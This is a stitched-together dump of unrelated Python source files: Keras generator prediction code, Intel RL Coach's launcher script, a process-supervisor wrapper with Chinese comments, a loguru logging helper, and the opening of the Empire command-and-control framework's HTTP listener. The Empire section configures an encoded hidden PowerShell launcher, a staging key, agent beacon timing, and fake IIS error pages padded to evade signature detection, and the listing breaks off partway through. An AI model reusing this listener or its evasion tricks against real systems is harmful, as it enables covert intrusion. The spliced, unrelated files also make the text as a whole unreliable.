nb_samples = len(x[0])
elif type(x) is dict:
nb_samples = len(list(x.values())[0])
else:
nb_samples = len(x)
all_outs.append(outs)
processed_samples += nb_samples
weights.append(nb_samples)
_stop.set()
if pickle_safe:
# Terminate all daemon processes
for p in generator_threads:
if p.is_alive():
p.terminate()
data_gen_queue.close()
if type(outs) is not list:
return np.average(np.asarray(all_outs),
weights=weights)
else:
averages = []
for i in range(len(outs)):
averages.append(np.average([out[i] for out in all_outs],
weights=weights))
return averages
def predict_generator(self, generator, val_samples, max_q_size=10, nb_worker=1, pickle_safe=False):
'''Generates predictions for the input samples from a data generator.
The generator should return the same kind of data as accepted by
`predict_on_batch`.
# Arguments
generator: generator yielding batches of input samples.
val_samples: total number of samples to generate from `generator`
before returning.
max_q_size: maximum size for the generator queue
nb_worker: maximum number of processes to spin up when using process based threading
pickle_safe: if True, use process based threading. Note that because
this implementation relies on multiprocessing, you should not pass
non picklable arguments to the generator as they can't be passed
easily to children processes.
# Returns
Numpy array(s) of predictions.
'''
self._make_predict_function()
processed_samples = 0
wait_time = 0.01
all_outs = []
data_gen_queue, _stop, generator_threads = generator_queue(generator, max_q_size=max_q_size, nb_worker=nb_worker,
pickle_safe=pickle_safe)
while processed_samples < val_samples:
generator_output = None
while not _stop.is_set():
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
break
else:
time.sleep(wait_time)
if isinstance(generator_output, tuple):
if len(generator_output) == 2:
x, y = generator_output
sample_weight = None
elif len(generator_output) == 3:
x, y, sample_weight = generator_output
else:
_stop.set()
raise Exception('output of generator should be a tuple '
'(x, y, sample_weight) '
'or (x, y). Found: ' + str(generator_output))
else:
x = generator_output
try:
outs = self.predict_on_batch(x)
except:
_stop.set()
raise
if type(x) is list:
nb_samples = len(x[0])
elif type(x) is dict:
nb_samples = len(list(x.values())[0])
else:
nb_samples = len(x)
if type(outs) != list:
outs = [outs]
if len(all_outs) == 0:
for out in outs:
shape = (val_samples,) + out.shape[1:]
all_outs.append(np.zeros(shape, dtype=K.floatx()))
for i, out in enumerate(outs):
all_outs[i][processed_samples:(processed_samples + nb_samples)] = out
processed_samples += nb_samples
_stop.set()
if pickle_safe:
# Terminate all daemon processes
for p in generator_threads:
if p.is_alive():
p.terminate()
data_gen_queue.close()
if len(all_outs) == 1:
return all_outs[0]
return all_outs
|
coach.py
|
#
# Copyright (c) 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
sys.path.append('.')
import ray
import dill
import socket
import weakref
import copy
from rl_coach.core_types import EnvironmentSteps
import os
from rl_coach import logger
import traceback
from rl_coach.logger import screen, failed_imports
import argparse
import threading
import atexit
import time
import sys
from rl_coach.base_parameters import Frameworks, VisualizationParameters, TaskParameters, DistributedTaskParameters
from multiprocessing.managers import BaseManager
from multiprocessing import Process
import multiprocessing
import subprocess
from rl_coach.graph_managers.graph_manager import HumanPlayScheduleParameters, GraphManager
from rl_coach.utils import list_all_presets, short_dynamic_import, get_open_port, SharedMemoryScratchPad, get_base_dir
from rl_coach.agents.human_agent import HumanAgentParameters
from rl_coach.graph_managers.basic_rl_graph_manager import BasicRLGraphManager
from rl_coach.environments.environment import SingleLevelSelection
from create_worker import create_worker_devcloud
import warnings
warnings.filterwarnings("ignore")
if len(set(failed_imports)) > 0:
screen.warning("Warning: failed to import the following packages - {}".format(', '.join(set(failed_imports))))
def get_graph_manager_from_args(args: argparse.Namespace) -> 'GraphManager':
"""
Return the graph manager according to the command line arguments given by the user
:param args: the arguments given by the user
:return: the updated graph manager
"""
graph_manager = None
# if a preset was given we will load the graph manager for the preset
if args.preset is not None:
graph_manager = short_dynamic_import(args.preset, ignore_module_case=True)
# for human play we need to create a custom graph manager
if args.play:
env_params = short_dynamic_import(args.environment_type, ignore_module_case=True)()
env_params.human_control = True
schedule_params = HumanPlayScheduleParameters()
graph_manager = BasicRLGraphManager(HumanAgentParameters(), env_params, schedule_params, VisualizationParameters())
if args.level:
if isinstance(graph_manager.env_params.level, SingleLevelSelection):
graph_manager.env_params.level.select(args.level)
else:
graph_manager.env_params.level = args.level
# set the seed for the environment
if args.seed is not None:
graph_manager.env_params.seed = args.seed
# visualization
graph_manager.visualization_parameters.dump_gifs = graph_manager.visualization_parameters.dump_gifs or args.dump_gifs
graph_manager.visualization_parameters.dump_mp4 = graph_manager.visualization_parameters.dump_mp4 or args.dump_mp4
graph_manager.visualization_parameters.render = args.render
graph_manager.visualization_parameters.tensorboard = args.tensorboard
graph_manager.visualization_parameters.print_networks_summary = args.print_networks_summary
# update the custom parameters
if args.custom_parameter is not None:
unstripped_key_value_pairs = [pair.split('=') for pair in args.custom_parameter.split(';')]
stripped_key_value_pairs = [tuple([pair[0].strip(), pair[1].strip()]) for pair in
unstripped_key_value_pairs if len(pair) == 2]
# load custom parameters into run_dict
for key, value in stripped_key_value_pairs:
exec("graph_manager.{}={}".format(key, value))
return graph_manager
def parse_arguments(parser: argparse.ArgumentParser) -> argparse.Namespace:
"""
Parse the arguments that the user entered
:param parser: the argparse command line parser
:return: the parsed arguments
"""
args = parser.parse_args()
# if no arg is given
if len(sys.argv) == 1:
parser.print_help()
exit(0)
# list available presets
preset_names = list_all_presets()
if args.list:
screen.log_title("Available Presets:")
for preset in sorted(preset_names):
print(preset)
sys.exit(0)
# replace a short preset name with the full path
if args.preset is not None:
if args.preset.lower() in [p.lower() for p in preset_names]:
args.preset = "{}.py:graph_manager".format(os.path.join(get_base_dir(), 'presets', args.preset))
else:
args.preset = "{}".format(args.preset)
# if a graph manager variable was not specified, try the default of :graph_manager
if len(args.preset.split(":")) == 1:
args.preset += ":graph_manager"
# verify that the preset exists
preset_path = args.preset.split(":")[0]
if not os.path.exists(preset_path):
screen.error("The given preset ({}) cannot be found.".format(args.preset))
# verify that the preset can be instantiated
try:
short_dynamic_import(args.preset, ignore_module_case=True)
except TypeError as e:
traceback.print_exc()
screen.error('Internal Error: ' + str(e) + "\n\nThe given preset ({}) cannot be instantiated."
.format(args.preset))
# validate the checkpoints args
if args.checkpoint_restore_dir is not None and not os.path.exists(args.checkpoint_restore_dir):
screen.error("The requested checkpoint folder to load from does not exist.")
# no preset was given. check if the user requested to play some environment on its own
if args.preset is None and args.play:
if args.environment_type:
args.agent_type = 'Human'
else:
screen.error('When no preset is given for Coach to run, and the user requests human control over '
'the environment, the user is expected to input the desired environment_type and level.'
'\nAt least one of these parameters was not given.')
elif args.preset and args.play:
screen.error("Both the --preset and the --play flags were set. These flags can not be used together. "
"For human control, please use the --play flag together with the environment type flag (-et)")
elif args.preset is None and not args.play:
screen.error("Please choose a preset using the -p flag or use the --play flag together with choosing an "
"environment type (-et) in order to play the game.")
# get experiment name and path
args.experiment_name = logger.get_experiment_name(args.experiment_name)
args.experiment_path = logger.get_experiment_path(args.experiment_name)
if args.play and args.num_workers > 1:
screen.warning("Playing the game as a human is only available with a single worker. "
"The number of workers will be reduced to 1")
args.num_workers = 1
args.framework = Frameworks[args.framework.lower()]
# checkpoints
args.save_checkpoint_dir = os.path.join(args.experiment_path, 'checkpoint') if args.save_checkpoint_secs is not None else None
return args
def add_items_to_dict(target_dict, source_dict):
updated_task_parameters = copy.copy(source_dict)
updated_task_parameters.update(target_dict)
return updated_task_parameters
def open_dashboard(experiment_path):
dashboard_path = 'python {}/dashboard.py'.format(get_base_dir())
cmd = "{} --experiment_dir {}".format(dashboard_path, experiment_path)
screen.log_title("Opening dashboard - experiment path: {}".format(experiment_path))
# subprocess.Popen(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL, shell=True, executable="/bin/bash")
subprocess.Popen(cmd, shell=True, executable="/bin/bash")
def start_graph(graph_manager: 'GraphManager', task_parameters: 'TaskParameters'):
graph_manager.create_graph(task_parameters)
# let the adventure begin
if task_parameters.evaluate_only:
graph_manager.evaluate(EnvironmentSteps(sys.maxsize), keep_networks_in_sync=True)
else:
graph_manager.improve()
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-p', '--preset',
help="(string) Name of a preset to run (class name from the 'presets' directory.)",
default=None,
type=str)
parser.add_argument('-l', '--list',
help="(flag) List all available presets",
action='store_true')
parser.add_argument('-e', '--experiment_name',
help="(string) Experiment name to be used to store the results.",
default='',
type=str)
parser.add_argument('-r', '--render',
help="(flag) Render environment",
action='store_true')
parser.add_argument('-f', '--framework',
help="(string) Neural network framework. Available values: tensorflow",
default='tensorflow',
type=str)
parser.add_argument('-n', '--num_workers',
help="(int) Number of workers for multi-process based agents, e.g. A3C",
default=1,
type=int)
parser.add_argument('-c', '--use_cpu',
help="(flag) Use only the cpu for training. If a GPU is not available, this flag will have no "
"effect and the CPU will be used either way.",
action='store_true')
parser.add_argument('-ew', '--evaluation_worker',
help="(int) If multiple workers are used, add an evaluation worker as well which will "
"evaluate asynchronously and independently during the training. NOTE: this worker will "
"ignore the evaluation settings in the preset's ScheduleParams.",
action='store_true')
parser.add_argument('--play',
help="(flag) Play as a human by controlling the game with the keyboard. "
"This option will save a replay buffer with the game play.",
action='store_true')
parser.add_argument('--evaluate',
help="(flag) Run evaluation only. This is a convenient way to disable "
"training in order to evaluate an existing checkpoint.",
action='store_true')
parser.add_argument('-v', '--verbosity',
help="(flag) Sets the verbosity level of Coach print outs. Can be either low or high.",
default="low",
type=str)
parser.add_argument('-tfv', '--tf_verbosity',
help="(flag) TensorFlow verbosity level",
default=3,
type=int)
parser.add_argument('-s', '--save_checkpoint_secs',
help="(int) Time in seconds between saving checkpoints of the model.",
default=None,
type=int)
parser.add_argument('-crd', '--checkpoint_restore_dir',
help='(string) Path to a folder containing a checkpoint to restore the model from.',
type=str)
parser.add_argument('-dg', '--dump_gifs',
help="(flag) Enable the gif saving functionality.",
action='store_true')
parser.add_argument('-dm', '--dump_mp4',
help="(flag) Enable the mp4 saving functionality.",
action='store_true')
parser.add_argument('-at', '--agent_type',
help="(string) Choose an agent type class to override on top of the selected preset. "
"If no preset is defined, a preset can be set from the command-line by combining settings "
"which are set by using --agent_type, --experiment_type, --environemnt_type",
default=None,
type=str)
parser.add_argument('-et', '--environment_type',
help="(string) Choose an environment type class to override on top of the selected preset."
"If no preset is defined, a preset can be set from the command-line by combining settings "
"which are set by using --agent_type, --experiment_type, --environemnt_type",
default=None,
type=str)
parser.add_argument('-ept', '--exploration_policy_type',
help="(string) Choose an exploration policy type class to override on top of the selected "
"preset."
"If no preset is defined, a preset can be set from the command-line by combining settings "
"which are set by using --agent_type, --experiment_type, --environemnt_type"
,
default=None,
type=str)
parser.add_argument('-lvl', '--level',
help="(string) Choose the level that will be played in the environment that was selected."
"This value will override the level parameter in the environment class."
,
default=None,
type=str)
parser.add_argument('-cp', '--custom_parameter',
help="(string) Semicolon separated parameters used to override specific parameters on top of"
" the selected preset (or on top of the command-line assembled one). "
"Whenever a parameter value is a string, it should be inputted as '\\\"string\\\"'. "
"For ex.: "
"\"visualization.render=False; num_training_iterations=500; optimizer='rmsprop'\"",
default=None,
type=str)
parser.add_argument('--print_networks_summary',
help="(flag) Print network summary to stdout",
action='store_true')
parser.add_argument('-tb', '--tensorboard',
help="(flag) When using the TensorFlow backend, enable TensorBoard log dumps. ",
action='store_true')
parser.add_argument('-ns', '--no_summary',
help="(flag) Prevent Coach from printing a summary and asking questions at the end of runs",
action='store_true')
parser.add_argument('-d', '--open_dashboard',
help="(flag) Open dashboard with the experiment when the run starts",
action='store_true')
parser.add_argument('--seed',
help="(int) A seed to use for running the experiment",
default=None,
type=int)
parser.add_argument('--ray_redis_address',
help="The address of the Redis server to connect to. If this address is not provided,\
then this command will start Redis, a global scheduler, a local scheduler, \
a plasma store, a plasma manager, and some workers. \
It will also kill these processes when Python exits.",
default=None,
type=str)
parser.add_argument('--ray_num_cpus',
help="Number of cpus the user wishes all local schedulers to be configured with",
default=None,
type=int)
parser.add_argument('--ray_num_gpus',
help="Number of gpus the user wishes all local schedulers to be configured with",
default=None,
type=int)
parser.add_argument('--on_devcloud',
help="Number of gpus the user wishes all local schedulers to be configured with",
default=False,
type=bool)
args = parse_arguments(parser)
graph_manager = get_graph_manager_from_args(args)
# Intel optimized TF seems to run significantly faster when limiting to a single OMP thread.
# This will not affect GPU runs.
# os.environ["OMP_NUM_THREADS"] = "1"
# turn TF debug prints off
if args.framework == Frameworks.tensorflow:
os.environ['TF_CPP_MIN_LOG_LEVEL'] = str(args.tf_verbosity)
# turn off the summary at the end of the run if necessary
if not args.no_summary:
atexit.register(logger.summarize_experiment)
screen.change_terminal_title(args.experiment_name)
# open dashboard
if args.open_dashboard:
open_dashboard(args.experiment_path)
# Single-threaded runs
if args.num_workers == 1:
# Start the training or evaluation
task_parameters = TaskParameters(framework_type="tensorflow", # TODO: tensorflow should'nt be hardcoded
evaluate_only=args.evaluate,
experiment_path=args.experiment_path,
seed=args.seed,
use_cpu=args.use_cpu,
save_checkpoint_secs=args.save_checkpoint_secs)
task_parameters.__dict__ = add_items_to_dict(task_parameters.__dict__, args.__dict__)
start_graph(graph_manager=graph_manager, task_parameters=task_parameters)
#start_graph_ray.remote(graph_manager,task_parameters)
# Multi-threaded runs
else:
#ray.init(redis_address=args.ray_redis_address,
# num_cpus=args.ray_num_cpus,
# num_gpus=args.ray_num_gpus)
total_tasks = args.num_workers
if args.evaluation_worker:
total_tasks += 1
if args.on_devcloud:
ips = create_worker_devcloud(args.num_workers)
@ray.remote
def f():
time.sleep(0.01)
#os.system('/usr/local/bin/qstat')
return ray.services.get_node_ip_address()
if args.on_devcloud:
ips = set(ray.get([f.remote() for _ in range(1000)]))
home_ip = socket.gethostbyname(socket.gethostname())
worker_ips = [z for z in ips if z != home_ip]
worker_hosts = ",".join(["{}:{}".format(n,get_open_port()) for n in ips])
else:
ray.init()
worker_hosts = ",".join(["localhost:{}".format(get_open_port()) for i in range(total_tasks)])
ps_hosts = "localhost:{}".format(get_open_port())
@ray.remote
def start_distributed_task(job_type, task_index, evaluation_worker=False):
task_parameters = DistributedTaskParameters(framework_type="tensorflow", # TODO: tensorflow should'nt be hardcoded
parameters_server_hosts=ps_hosts,
worker_hosts=worker_hosts,
job_type=job_type,
task_index=task_index,
evaluate_only=evaluation_worker,
use_cpu=args.use_cpu,
num_tasks=total_tasks, # training tasks + 1 evaluation task
num_training_tasks=args.num_workers,
experiment_path=args.experiment_path,
shared_memory_scratchpad=None,
seed=args.seed+task_index if args.seed is not None else None) # each worker gets a different seed
task_parameters.__dict__ = add_items_to_dict(task_parameters.__dict__, args.__dict__)
# we assume that only the evaluation workers are rendering
graph_manager.visualization_parameters.render = args.render and evaluation_worker
start_graph(graph_manager,task_parameters)
#p = Process(target=start_graph, args=(graph_manager, task_parameters))
#p.start()
return
@ray.remote
def start_distributed_ray_task(job_type, task_index, evaluation_worker=False):
task_parameters = DistributedTaskParameters(framework_type="tensorflow", # TODO: tensorflow should'nt be hardcoded
parameters_server_hosts=ps_hosts,
worker_hosts=worker_hosts,
job_type=job_type,
task_index=task_index,
evaluate_only=evaluation_worker,
use_cpu=args.use_cpu,
num_tasks=total_tasks, # training tasks + 1 evaluation task
num_training_tasks=args.num_workers,
experiment_path=args.experiment_path,
shared_memory_scratchpad=None,
seed=args.seed+task_index if args.seed is not None else None) # each worker gets a different seed
task_parameters.__dict__ = add_items_to_dict(task_parameters.__dict__, args.__dict__)
# we assume that only the evaluation workers are rendering
graph_manager.visualization_parameters.render = args.render and evaluation_worker
start_graph(graph_manager,task_parameters)
return 1
# parameter server
parameter_server = start_distributed_task.remote("ps", 0)
# training workers
# wait a bit before spawning the non chief workers in order to make sure the session is already created
workers = []
workers.append(start_distributed_task.remote("worker", 0))
time.sleep(2)
for task_index in range(1, args.num_workers):
workers.append(start_distributed_task.remote("worker",task_index))
# time.sleep(20)
# task_parameters = DistributedTaskParameters(framework_type="tensorflow", # TODO: tensorflow should'nt be hardcoded
# parameters_server_hosts=ps_hosts,
# worker_hosts=worker_hosts,
# job_type="worker",
# task_index=task_index,
# evaluate_only=True,
# use_cpu=args.use_cpu,
# num_tasks=total_tasks, # training tasks + 1 evaluation task
# num_training_tasks=args.num_workers,
# experiment_path=args.experiment_path,
# shared_memory_scratchpad=None,
# seed=args.seed+task_index if args.seed is not None else None) # each worker gets a different seed
# task_parameters.__dict__ = add_items_to_dict(task_parameters.__dict__, args.__dict__)
# # we assume that only the evaluation workers are rendering
# graph_manager.visualization_parameters.render = args.render
# start_graph(graph_manager,task_parameters)
if __name__ == "__main__":
main()
|
wrapper.py
|
#!-*- encoding: utf-8 -*-
import os
import sys
import json
import time
import signal
import logging
import threading
import subprocess
from peewee import DoesNotExist
from distsuper.models.models import Process as ProcessModel
from distsuper.common import tools
from distsuper.common.constant import STATUS
logger = logging.getLogger("wrapper")
# noinspection PyUnusedLocal
def sigdefault(process, info, *args):
program_id = info['program_id']
logger.info("进程%s收到信号,即将退出" % program_id)
os.killpg(process.pid, signal.SIGKILL)
# noinspection PyUnusedLocal
def sigterm(process, info, *args):
program_id = info['program_id']
logger.info("进程%s被SIG_TERM信号杀死" % program_id)
os.killpg(process.pid, signal.SIGKILL)
# noinspection PyUnusedLocal
def fail(args, retcode, info):
program_id = info['program_id']
logger.info("进程%s执行失败" % program_id)
# noinspection PyUnusedLocal
def success(args, retcode, info):
program_id = info['program_id']
logger.info("进程%s执行成功" % program_id)
def register_signal_handlers(process, info, callbacks):
"""
:param process: 子进程对象
:param info: 附加信息,可以传递到handler
:param callbacks: key => signal callback
key可以取sighub、sigint、sigquit、sigterm、sigdefault
:return:
"""
def register_signal_handler(sig, callback, default_callback=None):
if callback and callable(callback):
signal.signal(sig, callback)
elif default_callback and callable(default_callback):
signal.signal(sig, default_callback)
def handler_wrapper(_process, _info, signal_handler):
if signal_handler is None:
return None
def __wrapper(*args):
signal_handler(_process, _info, *args)
return __wrapper
defaultcallback = handler_wrapper(process, info,
callbacks.get('sigdefault'))
register_signal_handler(signal.SIGINT,
handler_wrapper(process, info,
callbacks.get('sigint')),
default_callback=defaultcallback)
register_signal_handler(signal.SIGQUIT,
handler_wrapper(process, info,
callbacks.get('sigquit')),
default_callback=defaultcallback)
register_signal_handler(signal.SIGTERM,
handler_wrapper(process, info,
callbacks.get('sigterm')),
default_callback=defaultcallback)
def touch_db(program_id, touch_timeout):
logger.info("进程%s运行中..." % program_id)
timeout_timestamp = int(time.time() + touch_timeout)
# 如果程序处于STARTING或STOPPING状态,无需touch db
try:
process = ProcessModel.select() \
.where(ProcessModel.id == program_id) \
.get()
except DoesNotExist:
logger.warning("touch_db失败,没有这条记录,%s可能已停止" % program_id)
return False
if process.status in (STATUS.STARTING, STATUS.STOPPING):
return True
# noinspection PyBroadException
try:
ret = ProcessModel.update(timeout_timestamp=timeout_timestamp) \
.where(ProcessModel.id == program_id,
ProcessModel.status == STATUS.RUNNING) \
.execute()
except Exception:
logger.exception("touch_db异常")
return False
if ret == 0:
logger.warning("touch_db失败,没有这条记录,%s可能已停止" % program_id)
return False
return True
# noinspection PyBroadException
def task_wrapper(args, info):
callbacks = {
'on_success': success,
'on_fail': fail,
'sigdefault': sigdefault,
'sigterm': sigterm
}
# 当前路径
directory = info.get("directory")
if directory is not None:
os.chdir(directory)
# 环境变量
env = os.environ
environment = info.get('environment')
if environment is not None:
environment = {
field.strip().split('=', 2)[0].strip():
field.strip().split('=', 2)[1].strip()
for field in environment.strip().split(';')
}
env.update(environment)
# 日志文件
stdout_logfile = info.get('stdout_logfile', '')
stderr_logfile = info.get('stderr_logfile', '')
stdout = sys.stdout
stderr = sys.stderr
if stdout_logfile:
tools.get_logger("wrapper",
file_name=stdout_logfile,
level=logging.INFO,
reset=True)
try:
stdout = open(stdout_logfile, 'a')
except OSError:
logger.warning("无法打开文件%s,日志打印到标准输出" % stdout_logfile)
if stderr_logfile:
try:
stderr = open(stderr_logfile, 'a')
except OSError:
logger.warning("无法打开文件%s,日志打印到标准错误" % stderr_logfile)
# 启动子进程
logger.info("启动子进程")
process = subprocess.Popen(args, env=env, shell=True,
stdout=stdout, stderr=stderr,
preexec_fn=os.setsid)
# 注册回调函数
register_signal_handlers(process, info, callbacks)
# noinspection PyBroadException
def touch_db_loop(_stop_info):
while True:
try:
if _stop_info["stop"]:
break
if not touch_db(info['program_id'], info['touch_timeout']):
p = _stop_info["process"]
logger.error("touch db失败,进程即将退出")
os.killpg(p.pid, signal.SIGKILL)
break
except Exception:
logger.exception("touch db发生未知异常")
time.sleep(1)
# touch db 线程
stop_info = {
"stop": False,
"process": process
}
thread = threading.Thread(target=touch_db_loop, args=(stop_info,))
thread.start()
# 处理进程结束的状态码
retcode = process.wait()
stop_info["stop"] = True
if retcode == 0:
if 'on_success' in callbacks and \
callable(callbacks['on_success']):
callbacks['on_success'](args, retcode, info)
else:
if 'on_fail' in callbacks and \
callable(callbacks['on_fail']):
callbacks['on_fail'](args, retcode, info)
thread.join()
def main():
try:
pid = os.fork()
except OSError:
sys.exit(1)
if pid != 0:
sys.exit(0)
os.setsid()
args = json.loads(sys.argv[1])
info = json.loads(sys.argv[2])
task_wrapper(args, info)
|
logging.py
|
# -*- coding: utf-8 -*-
import queue
import logging
from threading import Thread
from datetime import timedelta
from loguru._file_sink import FileSink
from najapy.common.async_base import Utils
class LogFileRotator:
@classmethod
def make(cls, _size=500, _time=r'00:00'):
return cls(_size, _time).should_rotate
def __init__(self, _size, _time):
_size = _size * (1024 ** 2)
_time = Utils.split_int(_time, r':')
now_time = Utils.today()
self._size_limit = _size
self._time_limit = now_time.replace(hour=_time[0], minute=_time[1])
if now_time >= self._time_limit:
self._time_limit += timedelta(days=1)
def should_rotate(self, message, file):
file.seek(0, 2)
if file.tell() + len(message) > self._size_limit:
return True
if message.record[r'time'].timestamp() > self._time_limit.timestamp():
self._time_limit += timedelta(days=1)
return True
return False
DEFAULT_LOG_FILE_ROTATOR = LogFileRotator.make()
class LogInterceptor(logging.Handler):
"""日志拦截器
"""
def emit(self, record):
Utils.log.opt(
depth=6,
exception=record.exc_info
).log(
record.levelname,
record.getMessage()
)
DEFAULT_LOG_INTERCEPTOR = LogInterceptor()
class QueuedFileSink(FileSink):
"""日志文件队列
"""
def __init__(self, path, *, buffer_size=0, buffer_block=False, **kwargs):
super().__init__(path, **kwargs)
self._buffer = queue.Queue(buffer_size)
self._buffer_size = buffer_size
self._buffer_block = buffer_block
self._worker = Thread(target=self._queued_writer, daemon=True)
self._running = True
self._worker.start()
def write(self, message):
try:
self._buffer.put(message, block=self._buffer_block)
except queue.Full as _:
print(f'Log queued writer overflow: {self._buffer_size}')
def stop(self):
self._running = False
self._worker.join(10)
super().stop()
def _queued_writer(self):
while self._running:
try:
message = self._buffer.get(block=True, timeout=1)
if message:
super().write(message)
except queue.Empty as _:
pass
def init_logger(
level, handler=None,
file_path=None, file_rotation=DEFAULT_LOG_FILE_ROTATOR, file_retention=0xff,
debug=False
):
level = level.upper()
if handler or file_path:
Utils.log.remove()
if handler:
Utils.log.add(
handler,
level=level,
enqueue=True,
backtrace=debug
)
if file_path:
Utils.log.add(
QueuedFileSink(
Utils.path.join(file_path, f'runtime_{{time}}_{Utils.getpid()}.log'),
rotation=file_rotation,
retention=file_retention
),
level=level,
enqueue=True,
backtrace=debug
)
else:
Utils.log.level(level)
logging.getLogger().addHandler(DEFAULT_LOG_INTERCEPTOR)
|
http.py
|
from __future__ import print_function
import base64
import copy
import json
import logging
import os
import random
import ssl
import string
import sys
import threading
import time
from builtins import object
from builtins import str
from flask import Flask, request, make_response, send_from_directory
from werkzeug.serving import WSGIRequestHandler
from pydispatch import dispatcher
from lib.common import bypasses
from lib.common import encryption
# Empire imports
from lib.common import helpers
from lib.common import obfuscation
from lib.common import packets
from lib.common import templating
class Listener(object):
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S]',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'),
'Category': ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name': {
'Description': 'Name for the listener.',
'Required': True,
'Value': 'http'
},
'Host': {
'Description': 'Hostname/IP for staging.',
'Required': True,
'Value': "http://%s" % (helpers.lhost())
},
'BindIP': {
'Description': 'The IP to bind to on the control server.',
'Required': True,
'Value': '0.0.0.0'
},
'Port': {
'Description': 'Port for the listener.',
'Required': True,
'Value': ''
},
'Launcher': {
'Description': 'Launcher string.',
'Required': True,
'Value': 'powershell -noP -sta -w 1 -enc '
},
'StagingKey': {
'Description': 'Staging key for initial agent negotiation.',
'Required': True,
'Value': '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay': {
'Description': 'Agent delay/reach back interval (in seconds).',
'Required': True,
'Value': 5
},
'DefaultJitter': {
'Description': 'Jitter in agent reachback interval (0.0-1.0).',
'Required': True,
'Value': 0.0
},
'DefaultLostLimit': {
'Description': 'Number of missed checkins before exiting',
'Required': True,
'Value': 60
},
'DefaultProfile': {
'Description': 'Default communication profile for the agent.',
'Required': True,
'Value': "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath': {
'Description': 'Certificate path for https listeners.',
'Required': False,
'Value': ''
},
'KillDate': {
'Description': 'Date for the listener to exit (MM/dd/yyyy).',
'Required': False,
'Value': ''
},
'WorkingHours': {
'Description': 'Hours for the agent to operate (09:00-17:00).',
'Required': False,
'Value': ''
},
'Headers': {
'Description': 'Headers for the control server.',
'Required': True,
'Value': 'Server:Microsoft-IIS/7.5'
},
'Cookie': {
'Description': 'Custom Cookie Name',
'Required': False,
'Value': ''
},
'StagerURI': {
'Description': 'URI for the stager. Must use /download/. Example: /download/stager.php',
'Required': False,
'Value': ''
},
'UserAgent': {
'Description': 'User-agent string to use for the staging request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'Proxy': {
'Description': 'Proxy to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'ProxyCreds': {
'Description': 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required': False,
'Value': 'default'
},
'SlackURL': {
'Description': 'Your Slack Incoming Webhook URL to communicate with your Slack instance.',
'Required': False,
'Value': ''
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
# randomize the length of the default_response and index_page headers to evade signature based scans
self.header_offset = random.randint(0, 64)
self.session_cookie = ''
# check if the current session cookie not empty and then generate random cookie
if self.session_cookie == '':
self.options['Cookie']['Value'] = self.generate_cookie()
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;} ',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
])
def method_not_allowed_page(self):
"""
Imitates IIS 7.5 405 "method not allowed" page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>405 - HTTP verb used to access this page is not allowed.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;} ',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;} ',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
